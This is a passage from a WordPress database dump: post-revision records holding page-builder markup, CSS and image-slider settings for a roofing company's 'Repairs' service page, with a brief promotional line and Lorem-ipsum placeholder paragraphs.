undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-72780545-3bc2-4038-8814-1dd9138d037c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-72780545-3bc2-4038-8814-1dd9138d037c\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"084a0777-f0fe-40d8-8160-5e5511fafb42\"} -->\n<style type=\"text/css\"> .block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-084a0777-f0fe-40d8-8160-5e5511fafb42 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/1.jpg\" alt=\"\" data-id=\"467\" data-link=\"https://cteisys.com/services/repairs/attachment/1/\" class=\"wp-image-467\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/2.jpg\" alt=\"\" data-id=\"468\" data-link=\"https://cteisys.com/services/repairs/attachment/2/\" class=\"wp-image-468\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/3.jpg\" alt=\"\" data-id=\"469\" data-link=\"https://cteisys.com/services/repairs/attachment/3/\" class=\"wp-image-469\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"bad42304-f956-4ff6-a71d-3d0927546977\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bad42304-f956-4ff6-a71d-3d0927546977 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-bad42304-f956-4ff6-a71d-3d0927546977\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Determining the underlying issue is critical when diagnosing a roof repair. We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"8f988807-9a52-467a-ae6e-048f9f4c3534\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-8f988807-9a52-467a-ae6e-048f9f4c3534 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8f988807-9a52-467a-ae6e-048f9f4c3534.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"d7963526-9288-4aa2-9602-2bca93be416b\"} -->\n<style type=\"text/css\"> .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d7963526-9288-4aa2-9602-2bca93be416b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-d7963526-9288-4aa2-9602-2bca93be416b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"f3c8d953-d75e-4cd0-a016-ebca0253c0de\"} -->\n<style type=\"text/css\"> .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f3c8d953-d75e-4cd0-a016-ebca0253c0de .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-f3c8d953-d75e-4cd0-a016-ebca0253c0de\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":471,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/4.jpg\" alt=\"\" class=\"wp-image-471\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"b2950aec-7a93-4bd2-bdf0-d978b7373e18\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-b2950aec-7a93-4bd2-bdf0-d978b7373e18 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-b2950aec-7a93-4bd2-bdf0-d978b7373e18\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":473,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/6.jpg\" alt=\"\" class=\"wp-image-473\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Repairs','','inherit','closed','closed','','269-revision-v1','','','2022-08-24 16:57:17','2022-08-24 16:57:17','',269,'https://cteisys.com/?p=474',0,'revision','',0);
INSERT INTO `wp0y_posts` VALUES (470,1,'2022-08-24 16:41:48','2022-08-24 16:41:48','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"60b023b9-e8c3-43e6-89ba-c3dfbd99479c\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-60b023b9-e8c3-43e6-89ba-c3dfbd99479c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"a687cc3b-6428-4919-81c1-fb1cd829e749\"} -->\n<style type=\"text/css\"> .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a687cc3b-6428-4919-81c1-fb1cd829e749 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a687cc3b-6428-4919-81c1-fb1cd829e749 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"8e161f0c-c998-4842-8873-8f192f3cb764\"} -->\n<style type=\"text/css\"> .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8e161f0c-c998-4842-8873-8f192f3cb764 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8e161f0c-c998-4842-8873-8f192f3cb764\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"6a2bf94f-4d60-433a-b525-d53bf9619216\"} -->\n<style type=\"text/css\"> .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a2bf94f-4d60-433a-b525-d53bf9619216 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6a2bf94f-4d60-433a-b525-d53bf9619216\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading 